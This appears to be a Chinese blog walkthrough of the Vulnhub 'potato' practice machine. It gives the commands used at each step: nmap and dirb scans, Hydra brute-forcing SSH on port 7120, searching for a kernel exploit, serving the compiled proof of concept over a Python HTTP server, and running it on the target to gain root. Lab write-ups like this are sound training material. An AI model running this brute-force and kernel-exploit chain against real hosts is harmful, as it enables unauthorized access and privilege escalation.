Vulnhub---potato

Vulnhub—potato

靶机下载地址:https://www.vulnhub.com/entry/potato-suncsr-1,556/

信息收集

扫描目标网段
nmap -sP 172.16.58.0/24

在这里插入图片描述

扫描端口
nmap -sS -sV -p- -v 172.16.58.130

在这里插入图片描述

访问网站

172.16.58.130
在这里插入图片描述

扫描网站目录
dirb http://172.16.58.130

在这里插入图片描述

发现漏洞

访问扫描出来的网址

http://192.168.232.188/info.php

在这里插入图片描述
这条路行不通,重新分析7120端口,利用ssh服务破解

ssh利用

Hydra破解ssh
hydra -l potato -P top1000.txt -vV ssh://172.16.58.130:7120

在这里插入图片描述
在这里插入图片描述

登陆

使用破解出来的账号密码进行登录

ssh potato@172.16.58.130 -p 7120

在这里插入图片描述

查看内核版本
uname -a

在这里插入图片描述
另起一个终端

searchsploit ubuntu 3.13.0-24

在这里插入图片描述
进入到该目录下编译poc
在这里插入图片描述
编译完成后放在/var/www/html/目录下,进该目录查看一下。
在这里插入图片描述

开启http服务
python -m SimpleHTTPServer 8000

在这里插入图片描述
回到shell将编译好的文件下载到potato中
在这里插入图片描述
查看权限,赋予权限,执行文件,然后拿到权限

ls -l
chmod +x 37292
./37292

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值